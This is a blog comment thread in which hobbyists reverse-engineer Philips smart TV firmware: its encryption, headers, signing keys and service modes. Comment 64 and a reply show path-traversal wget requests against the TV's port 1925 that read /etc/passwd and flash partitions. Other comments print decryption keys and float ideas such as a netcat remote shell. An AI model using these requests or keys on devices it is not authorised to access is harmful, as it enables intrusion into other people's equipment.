140 Comments

  1. topsy.com
    topsy.com January 26, 2010 at 11:33 . Reply
  2. lbpb
    lbpb January 29, 2010 at 11:47 . Reply

    Hi,
    I’d like to root my TV too. I tried to look at the FW upgrade and as you wrote there are several parts with lots of repetition. So it is probably just obfuscated but not really encrypted or at least not all of it. My guess is that it is some kind of structure/archive just xored with some key, but then this archive contains compressed files, however just unobfuscating it might reveal useful info. Anyway I couldn’t get any further for now. Other notes: my 8664 has port 80 open, but not answering to any request I tried. Port 8080 seems closed. There is a guy claiming to have fw sources: http://www.avforums.com/forums/lcd-led-lcd-televisions/1119695-there-any-custom-firmware-philips-televisions-firmware-editor-maybe.html (will try to contact him).

  3. rooter
    rooter January 29, 2010 at 19:01 . Reply

    Hi,

    I had a look at the newer firmware for the current 8xxx series.

    First, I stripped off the header and the, I think, signature to obtain the encrypted part. Then, I looked at all 16 byte blocks, sorted and counted them. One block occured very often, about 5000 times. Searching this block in the file revealed large areas with this block repeated in them. I found more then 100 separate areas distributed over the whole file.

    IMO this shows that the whole file is encrypted with the same 128 bit block algorithm. I think the encrypted repetitious block contains fill bytes, either all 0×00 or all 0xff.

    I think it’s definitely no XOR chiffre. In that case I would assume that some of the 16 byte block before the repeated areas would show some bytes of the repeated block in its last bytes, since I would assume that some of the previous areas wouldn’t end at a 16 byte boundary and hence end with the fill byte. But that’s apparently nowhere the case.

    You should use your draca tool again, but only on the encrypted part. Maybe we get some information about the block chiffre used that way. But I assume it’s not so easy to crack the key, even if I assume the cleartext to be known.

    Another way would be to either solder off the NAND flash and read it out, or use a JTAG interface to read the NAND flash through the CPU. Not easy either…

  4. lbpb
    lbpb January 29, 2010 at 20:29 . Reply

    I still think it’s just xor, for 2 reasons:
    1- it would be very stupid to use more advanced crypt and still encrypt every 128 bit block individually. Of course you could use more advanced block modes with xor too, but if you are just trying to lightly obfuscate, then it can make sense to just apply a simple xor;
    2- for some of the repeated blocks, there are also some nearby blocks that begin with the same bytes but end differently and some that end with the same bytes but begin differently. If it were a more advanced crypto, this would be very improbable.
    Of course this is not a guaranteee…anyway my next step is: take every block that repeats several times, xor the whole file with it and see if with any of them I get anything more interesting. This won’t work very well if different parts of the file are “coded” with different xor keys. Will post results.

  5. michu
    michu January 30, 2010 at 00:01 . Reply

    The draca results do not differ if I run it against the header-less firmware file.

    I also assume the 160 bytes in the header is the signature of the firmware.

    There are similar patterns in each firmware, but never the SAME – so the key has to be different in each firmware (check http://www.neophob.com/serendipity/index.php?/archives/183-Firmware-Visualizer-fwimage.html).

    Perhaps the ASCII text in the header is part of the key? (something like Q591E-0.100.0.0_)?

  6. lbpb
    lbpb January 30, 2010 at 08:28 . Reply

    Well trying to xor with the patterns didn’t lead anywhere. Also the non aligned blocks are very few and might be caused by encrypting different sections of the file individually. Just of note is that one single 128 bit block is repeated 5000 times, spread throughout the whole file, while the second most frequent block appears just about 500 times and is much more localized.

  7. rooter
    rooter January 30, 2010 at 10:29 . Reply

    It’s presumably some kind of block chiffre with a 128 bit key. As if the 128 bit key size isn’t enough of a challenge, deducing which encryption algorithm was used might be possible for a crypto expert, but not for me.

    The best bet might really be to somehow read out the NAND flash. Presuming that the partition content is not encrypted, we could read out the software and use a disassembler to learn how it works – there’s one for MIPS in the objdump GNU utility.

    Defective SSB’s anyone? Any current Philips TV with a firmware structure like this would be eligible.

  8. michu
    michu February 8, 2010 at 20:44 . Reply

    The firmware is encrypted with blowfish/AES/… as a simple xor does not decrypt the file. The key differs in each release…

  9. Tom
    Tom February 8, 2010 at 22:33 . Reply

    Regarding the binary garbage on the serial interface in the Jett mode: this looks like a bitrate/mode mismatch on the serial line. Try other speed settings. And don’t rely on the “console=ttyS1,38400n8″ statement. I’ve seen kernels which just ignored settings passed by the bootloader and used hardcoded values.

    Good luck! :-)

  10. lbpb
    lbpb February 9, 2010 at 08:57 . Reply

    Models with NetTV also have an internal Opera 9.5 browser, with javascript support but no flash/macromedia. It might be possible to use some opera exploit but I couldn’t find any for MIPS architecture…

  11. rooter
    rooter February 9, 2010 at 20:10 . Reply

    Hmm… that idea is not bad.

    Metasploit has some opera exploits, and a shell payload for MIPS linux. The busybox configuration from the open source publication pack suggests that there’s no shell, hence another payload would have to be developped – an exec of “busybox” for a list of the really available commands would be the first thing to do.

    Anyway, the first thing to verify is that the browser is really vulnerable for one of the known exploits.

  12. michu
    michu February 9, 2010 at 22:58 . Reply

    I used those unknown 160 bytes in the header to decrypt the firmware, I tried AES-128-ECB, IDEA-ECB, DES, BLOWFISH, I used the key as little endian or big endian – without success.


    #!/bin/bash
    for i in {0..146}
    do
    echo “———- $i”
    dd if=key of=key.tmp bs=1 count=16 skip=$i 2> /dev/null
    openssl aes-128-ecb -d -nosalt -in nohde -out decr.xxx -kfile key.tmp
    dd if=decr.xxx skip=28554720 bs=1 count=128 2> /dev/null| hexdump -Cv
    done

  13. lbpb
    lbpb February 12, 2010 at 09:06 . Reply

    Apparently my tv is not affected by the exploit I found on Metasploit (I just found 1 anyway, if you found more then I must have missed something).

  14. michu
    michu February 13, 2010 at 16:49 . Reply

    hmm why is the firmware file-size 28’750’876 (-732 bytes header) bytes while the flashed size is only 25’783’095 bytes (Totalsize flashed: 25783095, TotalProgramSize: 25783095)? What are the remaining 2’967’049 bytes?

  15. michu
    michu February 13, 2010 at 17:51 . Reply

    Ok those 160 bytes in the header are really a signature, I nulled out those 160 bytes and tried to flash it. The validation process fails:

    00 052.448 V: 93%
    00 052.989 V: 97%
    00 053.439 Invalid Firmware! Bad checksum or bad signature.

  16. michu
    michu February 18, 2010 at 21:15 . Reply

    I just found an interesting note in the service manual:

    The set software and security keys are stored in a NAND- Flash, which is connected to the PNX8541 via the PCI bus.

  17. rooter
    rooter February 19, 2010 at 08:35 . Reply

    That’s why I asked for defective PCB’s :-)

  18. michu
    michu February 22, 2010 at 01:17 . Reply

    Infos about “Option number” in the SAM Menu:

    The first line (group 1) indicates hardware options 1 to 4.
    The second line (group 2) indicates software options 5 to 8.

  19. alterpeople
    alterpeople March 13, 2010 at 17:07 . Reply

    fixing a q591e -la with mpeg4 hardware actived wrongly.
    Booting with jetfiles, connect the compair, select q52x
    use nvm editor and set the address 0124 the value 42

    ;-)

  20. alterpeople
    alterpeople March 13, 2010 at 18:47 . Reply

    the same for value must be changed for 10EF and 16E8 location addresses .

    enjoy

    ;)

  21. Joao
    Joao April 15, 2010 at 09:56 . Reply

    I do not currently own a Philips Net TV but I’m considering buying one. Someone please correct me if I’m wrong but these TV models do not have Bluetooth support. From what I read so far, text input is cumbersome (not only on the Philips but on every other brand), so Bluetooth would be good in order to have a wireless keyboard. Playstation, for instance, supports a Bluetooth keyboard. Being able to change the firmware would have, at least, one interesting objective: adding Bluetooth support!

  22. michu
    michu April 15, 2010 at 11:27 . Reply

    hey joao

    You’re right, there is no bluetooth hardware installed, at least not on my model.

  23. Steve
    Steve May 29, 2010 at 10:16 . Reply

    That’s why I asked for defective PCB’s :-)

  24. Baris
    Baris June 1, 2010 at 16:23 . Reply

    I am trying to make an EIB cable but I am without luck.
    Does the serial port of the TV need to be activated somehow?

    I made a “stereo jack to serial” which I linked to a serial to USB dongle. I tried both 115200 and 38400 baud.

    Do I need to enable/disable software or hardware control in the terminal program?

  25. MartiniB
    MartiniB June 10, 2010 at 10:15 . Reply

    just idea, the key(or index of it) can be in the header

    i have compared two same version(Release for TV520 R2:Q591E-0.83.0.0 Generation date:29/09/2008 13:44:08) firmwares
    !!! version is the same but different autorun.upg
    first 543 butes are exactly same
    544 to 703 ???????????
    704 to 728 plain text “Q591E-0.83.0.0_commercial”
    729 to 28648764 ???????????

  26. Terap
    Terap June 25, 2010 at 00:03 . Reply

    Some LG info,
    http://www.lg-hack.info/ is an LG LCD TV hacking website, with details on unpacking/repacking the EPK/PAK firmware files.

    openlgtv, http://mikko.korkalo.fi/openlgtv/ is a Linux distribution that replaces the LG official firmware.

  27. [...] Newphob.com: Someone also trying to hack his TV (a Philips PFL9703), who’s gotten further but hasn’t cracked it yet. [...]

  28. Mark Zocher
    Mark Zocher October 7, 2010 at 17:08 . Reply

    Wow, you’ve gotten way further with this project than I ever did! (see http://www.myrejectedprojects.com/2010/09/hacking-my-philips-tv/). Did you see the progress the SamyGo project has made on the Samsungs? (http://samygo.sourceforge.net)

  29. Bert
    Bert October 26, 2010 at 20:51 . Reply

    I’m also looking for connection to my Philips TV. The Help mentions BusyBox, which reminds me of the Xtreamer. The Xtreamer can be reached by putting some .php files on a USB device and “open” one of these (fakeshell.php). Files can be found at http://www.mavvy.net

  30. bla
    bla January 4, 2011 at 18:45 . Reply

    Found following in http://www.scribd.com/doc/23986104/Philips-Ch-q529-1e-Lb:

    ReadCehtvData ConfigVersion: [0.01] OK
    ReadCehtvData ProductID: [Q591E] OK
    ReadCehtvData OUI: [0000903E] OK
    ReadCehtvData HardwareModel: [0203] OK
    ReadCehtvData HardwareVersion: [0100] OK
    ConvertAscii2Bin started
    ConvertAscii2Bin done
    ConvertAscii2Bin started
    ConvertAscii2Bin done
    ReadCehtvData PublicKey: OK
    ReadCehtvData done, ConfigOK: TRUE

    —>

    ReadCehtvData PublicKey: OK means that it uses some asymmetric encryption or?

  31. bla
    bla January 5, 2011 at 11:02 . Reply

    160 Byte is 1280 bit. There is also RSA-1280. Is RSA used here?

  32. none
    none January 5, 2011 at 14:23 . Reply

    No firmware hack, but access to the tv via network allows remote control and streaming to the ‘TV’: http://sourceforge.net/apps/mediawiki/jointspace/index.php?title=Introduction

  33. rysmario
    rysmario January 8, 2011 at 08:56 . Reply

    the file seems to be compressed too.. referring to Q5551_v1.140.27.0.upg upgrade log 81mb Update ‘iStoredSize’ are cumulated 81190368 bytes whereas the image payload is only 74936429 bytes large.

    encryption must be 128bit block-cypher – if i take the image apart referring to the header details – it is padded to fit 16byte blocks…

  34. bak
    bak January 12, 2011 at 17:00 . Reply

    may provide a clue on algorithms used (gzip, sha1) – at least on this 58″

    http://www.p4c.philips.com/files/5/58pfl9955h_12/58pfl9955h_12_osr_eng.txt

  35. bla
    bla January 18, 2011 at 16:11 . Reply

    Someone tried to write a Hello-World programm and to execute with the Jett mode?

  36. bla
    bla January 18, 2011 at 16:31 . Reply

    Here is EEPROM-dump of 42pf9631d :
    http://www.badcaps.net/forum/showthread.php?t=9751

  37. Mark
    Mark February 2, 2011 at 04:39 . Reply

    It seems that the unique way to read the NVM is to dismantle it from the tv’s pcb. No manual edit mode ? HyperTerminal on service UART is able to show logs only, what about a way to enter as root so making read and write possible? Thanks for some answer.

  38. Joshua
    Joshua February 9, 2011 at 23:19 . Reply
  39. ScripTrix
    ScripTrix February 22, 2011 at 09:11 . Reply

    Have u take a look to the HELPFILE UPG ?
    it’s no “Version Header” only 00h.
    From 211h – 2DF is crypt stuff/header or so ? however the comercial string is present with a parm ->
    xxxxx_commercial.FORCEUPGRADE

  40. ScripTrix
    ScripTrix February 23, 2011 at 08:55 . Reply

    e.g. for my TV 7605 -> http://www.p4c.philips.com/files/4/40pfl7605h_12/40pfl7605h_12_mus_deu.zip

    It’s a ~3 MB File including the Helpsystem manual

  41. gigirex
    gigirex July 18, 2011 at 15:32 . Reply

    Hi!
    Did you have the HsvAntennaDigSrvcTable file format?
    Thanks

  42. George
    George July 22, 2011 at 17:56 . Reply
  43. Ian
    Ian July 30, 2011 at 19:25 . Reply

    I’ve just realised that my Phillips TV runs Linux. I was so exited. Then the disappointment of finding there is no way in yet. One huge hole in the GPL, yes you can download the source, yes you can modify it and compile it, no you can’t run it because you can’t sign it!

  44. Recep
    Recep October 3, 2011 at 23:24 . Reply

    Try binwalk. I used it to analyze son bravia firmware

  45. Detektei
    Detektei November 7, 2011 at 00:28 . Reply

    Is there a chance to upgrade the unsupported Firmware of 37PFL8404..?

  46. Anonymous
    Anonymous December 5, 2011 at 22:22 . Reply

    I don’t think you can decrypt the firmware very easy. This series powerPC processors has on-chip fuses which can’t be read back an internal processor can use these data do decrypt data. probably an AES-key is stored there.

    Without: the private AES-key, much-patient in bruteforce, rainbow-tables or corrupt Phillips employees you are at an dead end.

    At the company where I work we use this processor in a SetTopBox with no smartcard. The key programmed in the fuses is the identification of the box.

  47. corecoder
    corecoder December 16, 2011 at 17:39 . Reply

    A different vector than firmware:: the Nettv series run Opera 10 and it’s possible to enter any URL. It supports Javascript and the 2011 TVs support SWF. Any ideas if or how this can be exploited?

  48. bkgg
    bkgg January 8, 2012 at 12:09 . Reply

    Well, I’m no pratitioner, but maybe 2 cents from me.

    Regarding the Encryption:
    With my model, a xxpfl5xxx, if you want to record something (regardless of timeshift or normal) the TV wants to format a connected HDD. The manual states, that you cant use this HDD in this condition otherwise.
    This could either be because its formated for Linux, or because its encrypted. In latter case, maybe its made with the same method and key as the firmware, because it has to be decoded again, and why use a second key for this. That would add cost.

    Other possibility would be jointspace. Your articel is now 2 years old, and it has probably more functions now than then.
    First the webserver is now in use with xxPFL5xx6 to xxPFL9xx6 models. Via port 1925 you can use some GET and two POST methods. SO no big deal for rooting I gues.
    But Jointspace has a lot of methods in use. With this you can prorgamm software which is executed on your PC but shown on your TV. So maybe, if there is a weakness in their drawing function it is possible to activate telnet through a pufferoverflow or something like this.
    (For example there is software for just showing your monitor on TV via ethernet or for playing Doom, controlled by remotecontrol http://jointspace.sourceforge.net/download.html )

  49. corecoder
    corecoder January 20, 2012 at 23:10 . Reply

    The HDD is not encrypted, just formatted as extfs. But the recordings are encrypted to only allow playback on the TV they were recorded -> maybe this?

    There also is an exploit for the Allegro Rompager Webserver:: http://www.securiteam.com/exploits/5XP0M0UCUO.html
    But I’m no expert on how to use this.

  50. Anonymous
    Anonymous March 7, 2012 at 11:56 . Reply

    This is the public key from the TV used as cookie to identify a debug USB stick during bootup (from /proc/public_key).

    Maybe this is also used for the Firmware?

    MIME-Version: 1.0
    Content-Type: application/octet-stream; name=”public_key256.out”
    Content-Transfer-Encoding: base64
    Content-Disposition: attachment; filename=”public_key256.out”

    QYMOXtEEAtDq1L/2xwExIU6qcuV4njMeDz68CCwzpoFTlgrK6IfrefrAe1R/jfLJBAOCKN+tf8Vt
    D/9n9W1Z/GWJYEFEe7hT5H2U+hxMBOnhGGJ3Ggl2JtPccEhOdXWL3uCZ8bqjCSghP6qtAEfZzG1Z
    BH+aE/jnhHD5UO+4gvqEqWM4TrpgY9DM4zYhOCEnLsIa24zoygMmNTnLkEYTftmlqgqrhg01X87w
    77ptPRskrxnm71z4BCMDXedmzKaw/lIEvfIuDYlGqSUOmQCv3m4YW1gddqymMu/yNyKnC5zr5gvE
    0cExBC05MkyFaU9365LJBongz5Rr0WIFuU7GvwEAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

  51. Anonymous
    Anonymous March 7, 2012 at 12:02 . Reply

    I forgot – this is the key from the PFL 7xx6 series

  52. pippo
    pippo April 9, 2012 at 16:38 . Reply

    @55: where did you get that public key from?
    And what’s the debug usb stick is supposed to do?

  53. Anonymous
    Anonymous April 18, 2012 at 11:22 . Reply

    /proc/public_key is used to decrypt UPG. But it must be 256 bytes. This key is too big.

  54. Anonymous
    Anonymous April 30, 2012 at 12:34 . Reply

    The file has 512 bytes, yes, but if you look at the hex dump, only the first 256 bytes have useful “randomlike” values. The remaining bytes are 01 00 01 00 00 00 00 …

  55. Anonymous
    Anonymous May 3, 2012 at 06:45 . Reply

    01 00 01 00 00… is a well-known RSA public exponent, while first half of the file is a RSA modulus.
    UPG is crypted using AES-256. Decryption key and SHA-1 checksum are stored in RSA crypted block (0×220-0x2A0).
    To decrypt 128 bytes you will need a modulus of 128 bytes, not 256.

  56. Panayotis
    Panayotis August 9, 2012 at 10:21 . Reply

    Any ideas how to unlock the dvb t/c for all countries or Greece at least. Thanks in advance

  57. Garfield
    Garfield December 20, 2012 at 09:37 . Reply

    I have a 47pfl9732 with a “ask for Firware boot loop” issue, can someone share JETTFILES with me?
    Thanks in advance.

  58. Bert
    Bert December 20, 2012 at 16:03 . Reply

    Used SAM mode to change DVB-T settings on my PFL9703. Now the TV continuously re-boots. Can’t put the TV back into SAM to revert to standard options. Any suggestions on how to get around or stop the TV from re-booting? Thanks

  59. Thomas
    Thomas April 2, 2013 at 10:01 . Reply

    Is anyone still trying to hack the firmware? I downloaded this sources for another TV model: http://www.p4c.philips.com/files/4/40pfl5507k_12/40pfl5507k_12_osf_eng.zip
    In linux_kernel_v2.6.28.9/NXP_patches_512/ there is a file mtd_auth_squash_using_keyctrl_block.patch which includes a public key. It is the same key as posted above in the comments. So obviously the key is the same for all models. There is also some information about how to decrypt the MTD blocks. Some other files look also promising.

  60. bs
    bs April 5, 2013 at 01:21 . Reply

    Found a link to sources for your particular model: http://www.p4c.philips.com/cgi-bin/dcbint/files/5/52pfl9703_98/52pfl9703_98_osf_aen.zip

    Note that there are 3 sub-models of the pfl9703 listed there (http://www.p4c.philips.com/cgi-bin/dcbint/files/5)

    I’m interested in buying a 55pfl5507k in Germany and I hope for some dirmware improvements / fixes to this otherwise rine TV.

  61. Luis
    Luis April 13, 2013 at 14:45 . Reply

    Hello, For what i have seen here this might be a newbie thing, but who knows, maybe you did not thought of it.

    I came here lookig for info since im about to aquire a philips tv (or maybe LG, any advice on that?)

    The thing is, a while ago i tried to hack a STB from my ISP for watching his video network the device had literally no info in the internet, after osme googling i found how to “detect” a serial port wich i was able to use via an arduino working as conversor (usb->serial)

    In my case the device was VERY locked, pressing keys on the serial console caused some kind of debug to be shown, no more no less, but after some googling i found that the boot process could be stoped on the bootloader pressing Ctrl+C at power-on. Try that ;)
    After you are there try to get some help from the bootloader shell, which i do not recognize, obviously its not the broadcom one
    What i did finally was:
    1 – build a telnet daemon and edit a init scipt (it had the init script but no binaries)
    2- use the chainload to build the utilities i needed and put them inside a big free partition used for the device settings

    i did not continue my work sice it proved i did not have that much time for aa simple torrent client which needed this kind of work

    The thing is, inside this device i was able to track down the firmware upgrade process, the certificates for firmware decription, the flash commands even had help XD
    The other thing is, i had the option for tftp boot which i was not able to use, since the bootloader checked a signature somewhere in the kernel mtd, this caused to not being able to boot even from the extracted rom kernel image
    I also found a secondary kernel partition

  62. Another Bert
    Another Bert April 29, 2013 at 10:58 . Reply

    My 2 cents in finding root access:
    Maybe some useful info following these instructions:

    ENTER: 062596 “INFO” or if your remote has no info button press “OK”
    Theres loads to play with in here The menu is very well laid out and informative. “Virgin mode” is the factory reset
    DO NOT ADJUST anything on the “OPTION NUMBERS” menu, GROUP 1 OR GROUP 2 beasties be here.
    (From: http://www.digitalworldz.co.uk/247216-philips-television-secret-menu.html)

    Philips service manual:
    http://www.go-gddq.com/upload/2011-10/11102710303370.pdf

  63. genesis
    genesis August 17, 2013 at 21:35 . Reply

    due to special circumstances I do not have access to my tv at the moment so I cannot test anythingright now but I think the browser may be indeed a valuable attack vector. maybe it is possible to access the file system and gain some information by using special URIs like about:info or file:// Once I have access again I will dump the network traffic while the <<tv installs an app. maybe this will provide enough information to fake the installation server in my home LAN and let me install own apps like a remote shell – or simpler- A shell script which uses netcat provided with busybox to open a remote shell. take a look on the approach of this guy: http://haxit.blogspot.com.es/2013/08/hacking-transcend-wifi-sd-cards.html to get an idea of what I intend to do

  64. bobom
    bobom December 21, 2013 at 22:05 . Reply

    It seems that on my pfl5008 port open for jointspace can be used for something else …

    $ wget -q -O – http://192.168.1.14:1925///proc/cpuinfo
    Processor : ARMv7 Processor rev 0 (v7l)
    BogoMIPS : 1694.10
    Features : swp half thumb fastmult vfp edsp vfpv3 vfpv3d16
    CPU implementer : 0×41
    CPU architecture: 7
    CPU variant : 0×3
    CPU part : 0xc09
    CPU revision : 0

    Hardware : MT5880
    Revision : 0000
    Serial : 0000000000000000

    $ wget -q -O – http://192.168.1.14:1925///etc/passwd
    root:x:0:0:root:/basic:/bin/sh

    etc.

    ;)

  65. Luis D
    Luis D December 22, 2013 at 00:06 . Reply

    it also works on 42pfl7007g

  66. Vesly
    Vesly December 22, 2013 at 20:47 . Reply

    Hello, this is crazy interesting, but out of my skill.
    I have at home Phlips 32PFL343D/12 stucked in UPGRADE MENU and I am unable to CANCEL it. The latest firmware from Philips did it.
    Can someone elp me to CANCEL it and use the old FW ?
    Thx a lot

  67. SuperVirus
    SuperVirus January 6, 2014 at 01:34 . Reply

    How about the mtd devices?

    wget http://192.168.1.14:1925///dev/mtd0ro
    or
    wget http://192.168.1.14:1925///dev/mtd0

    with mtd0…mtdXX

    they may give you a dump of the different flash (nand) partitions…

  68. brandy
    brandy January 6, 2014 at 11:36 . Reply

    After some days of hacking I have now been able to extract the contents of the Autorun.upg of my 42PFL4208K12.

    The file is encrypted using AES128 and probably signed using RSA4096. Luckily, the required keys can be downloaded directly from the TV using the jointspace port (see bobom’s post above):

    /3rd_ro/key/TPVision_MTK2K13PLF_EU_UPG_AES.key
    /3rd_ro/key/TPVision_MTK2K13PLF_EU_UPG_AES.iv
    /3rd_ro/key/TPVision_MTK2K13PLF_EU_UPG_PubKey.pem

    The actual file names might vary depending on the TV model but can be found in the file /basic/libmtkapp.so using the command

    strings libmtkapp.so | grep /key/

    Notes on AES decryption
    ———————–

    The data is encrypted without using block padding. If the payload length is not a multiple of the block length (16 bytes) then the ciphertext bytes of the incomplete last block must simply be XORed with the corresponding bytes of the AES key before before writing them to the output.

    UPG file structure
    ==================

    +——————————————-+
    | Plaintext UPG header (length 0×80) |
    +——————————————-+
    | AES128 encrypted UPG header (length 0×90) |
    +——————————————-+
    | AES128 encrypted block (variable length) |
    +——————————————-+
    | AES128 encrypted block (variable length) |
    +——————————————-+
    | … |
    +——————————————-+
    | RSA4096 signature (length 0×100) |
    +——————————————-+

    Plaintext UPG header
    ——————–

    0000:0000 | 44 30 54 4B 53 30 5F 41 75 74 6F 5F 00 31 31 2E | D0TKS0_Auto_.11.
    0000:0010 | 31 00 32 4B 31 33 20 4F 50 4C 46 20 35 30 30 30 | 1.2K13 OPLF 5000
    0000:0020 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….
    0000:0030 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….
    0000:0040 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….
    0000:0050 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….
    0000:0060 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….
    0000:0070 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….

    AES128 encrypted UPG header
    —————————

    Key: 09291094092910940929109409291094
    IV: 00000000000000000000000000000000

    After decryption:
    0000:0000 | 54 50 56 5F 23 44 48 40 46 69 52 6D 31 31 2E 31 | TPV_#DH@FiRm11.1
    0000:0010 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….
    0000:0020 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….
    0000:0030 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….
    0000:0040 | 00 00 00 00 00 00 00 00 35 66 3F 09 50 00 00 00 | ……..5f?.P…
    0000:0050 | 50 48 49 4C 49 50 53 5F 32 4B 31 33 5F 48 54 5F | PHILIPS_2K13_HT_
    0000:0060 | 53 56 54 5F 44 4C 00 00 00 00 00 00 00 00 00 00 | SVT_DL……….
    0000:0070 | 8B 93 4D FA 47 B2 3D 6C B4 A6 56 FF DA D0 11 23 | ..MúG²=l´¦VÿÚÐ.#
    0000:0080 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….

    AES128 encrypted blocks
    ———————–

    Key: md5sum of /3rd_ro/key/TPVision_MTK2K13PLF_EU_UPG_AES.key
    IV: md5sum of /3rd_ro/key/TPVision_MTK2K13PLF_EU_UPG_AES.iv

    Each block has a separate 12-byte header

    +———————————–+
    | tag1 | tag2 | length | data1 |
    +———————————–+
    | data2 | data3 | data4 | … |
    +———————————–+

    tag1: 4 ASCII characters
    So far the tags ‘ixml’, ‘edfu’, ‘kern’, ’3rdp’, ‘pqaq’, ‘root’ and ‘cfig’
    have been encountered.

    tag2: Always 01 00 00 00 (?)

    length: Length of the plaintext payload in bytes.
    The encrypted block is always 60 bytes longer than this value.

    Example (before decryption):
    0000:0000 | 65 64 66 75 01 00 00 00 B4 6F 44 01 EA CC B1 1B | edfu….´oD.ê̱.

    tag1 = ‘edfu’
    tag2 = 00000001
    length = 01446FB4

    The decrypted plaintext has a further 48-byte header:

    +——————-+
    |’reserved mtk inc’ |
    +——————-+
    | MD5sum of payload |
    +——————-+
    | reserved (all 0) |
    +——————-+

    Example (after decryption):
    0000:0000 | 72 65 73 65 72 76 65 64 20 6D 74 6B 20 69 6E 63 | reserved mtk inc
    0000:0010 | C4 D3 B2 22 C4 85 F1 B9 4A 42 64 35 0D DB 97 FB | ÄÓ²”Ä.ñ¹JBd5.Û.û
    0000:0020 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….

    Thus the total length overhead is 60 bytes (12 bytes block header + 48 bytes plaintext header).

    Inventory
    ———

    The block tagged with ‘ixml’ contains an inventory in XML format, i.e. an XML file listing the contents of the UPG file, including block offsets, lengths, file names and descriptions of the various blocks. If you have already updated the firmware of your TV then you will probably find a copy of this file in /3rd_rw/upgrade/download.xml

    File system images
    ——————

    File system images have yet another 4k header, the content of which is not yet known.
    Obviously it contains an MD5 sum, but so far I wasn’t able to find out which part of the data it covers.

    Example:
    0000:0000 | 4E 46 53 42 02 00 00 00 08 00 02 37 F8 02 6D 64 | NFSB…….7ø.md
    0000:0010 | 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | 5……………
    0000:0020 | 02 40 00 00 00 08 61 37 34 66 66 63 36 65 39 30 | .@….a74ffc6e90
    0000:0030 | 63 64 38 37 32 35 31 39 63 36 66 35 38 31 61 34 | cd872519c6f581a4
    0000:0040 | 61 65 36 35 32 34 00 00 00 00 00 00 00 00 00 00 | ae6524……….
    0000:0050 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….
    0000:0060 | 00 00 00 00 00 00 00 16 0A 45 23 14 18 53 01 1E | ………E#..S..
    0000:0070 | DB 8A 10 46 BF 48 43 71 D7 9A 73 1F 6C 59 66 DB | Û..F¿HCq×.s.lYfÛ
    0000:0080 | BC 94 61 CD 44 F7 CB A5 FC EF 21 C3 C0 F1 95 79 | ¼.aÍD÷Ë¥üï!ÃÀñ.y
    0000:0090 | 9E 70 E0 65 5E 2A AB FC 6F D4 F7 35 13 4E CD E0 | .pàe^*«üoÔ÷5.NÍà
    0000:00A0 | B5 2B EA 2D 8E 7C 9E DA F8 5E E6 25 BA 4D 32 1F | µ+ê-.|.Úø^æ%ºM2.
    0000:00B0 | 51 17 F6 B6 BB A9 E7 9A 8B C7 BD C0 15 8F 8D 47 | Q.ö¶»©ç..ǽÀ…G
    0000:00C0 | 51 00 5E A0 98 BB 2B 44 87 09 0D A4 58 31 B0 4A | Q.^ .»+D…¤X1°J
    0000:00D0 | 5F FA 02 6D 9E BB 00 24 DC BF 32 4E 8C E3 A8 DD | _ú.m.».$Ü¿2N.ã¨Ý
    0000:00E0 | 2A FC 8F 46 93 F8 2F 00 00 00 00 00 00 00 00 00 | *ü.F.ø/………
    0000:00F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….
    0000:0100 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….
    0000:0110 | … (0-padding to 0x3ff)

    Furthermore, the Squashfs images use LZO compression, thus you need to make sure that your Linux kernel (or your squashfs-tools) support LZO/LZMA compression.

    RSA signature
    ————-

    The meaning of the last 256 bytes of the UPG file is not clear yet. However, since there’s a 4096 bit RSA public key file on the TV, this block is likely the RSA signature of the UPG file. So far I have not been able to verify the file using the public key, though.

    1. Luis D
      Luis D January 11, 2014 at 03:54 . Reply

      Thanks Brandy, can you post the commands to extract the files? im not god at hex edit and gpg

  69. kazakoffd
    kazakoffd January 10, 2014 at 22:08 . Reply

    Good job! Its nice to hear that somebody has an interest in hacking phTV!
    p.s. doesnt work on pfl5507 with latest firmware will try to downgrade;(

  70. brandy
    brandy January 12, 2014 at 14:08 . Reply

    Well, due to the non-standard encryption you won’t be able to decrypt all parts using standard tools without a bit of hex editing. This only works for those parts with a size which is a multiple of 16 bytes. Luckily, for the file system images this is the case.

    As an example, here’s a recipe to extract the root file system image using only standard Linux tools:

    Start by finding its offset in the UPG file

    > grep -oba root Autorun.upg
    > 24916963:root
    > 99079517:root

    Unfortunately, the string ‘root’ occurs twice, so we need to find out which is the correct one:

    > hexdump -C -s 24916963 -n 16 Autorun.upg
    > 017c33e3 72 6f 6f 74 e9 62 4d 46 a4 61 80 ff 33 fc 9d 60 |root.bMF.a..3..`|

    This doesn’t seem to be the right one since ‘root’ isn’t followed by the byte sequence 01 00 00 00. Thus, we try the next offset.

    > hexdump -C -s 99079517 -n 16 Autorun.upg
    > 05e7d55d 72 6f 6f 74 01 00 00 00 00 90 57 03 ea cc b1 1b |root……W…..|

    There we are. The offset is 99079517 and the length is 0×03579000 (56070144).

    Now we extract the encrypted image from Autorun.upg.
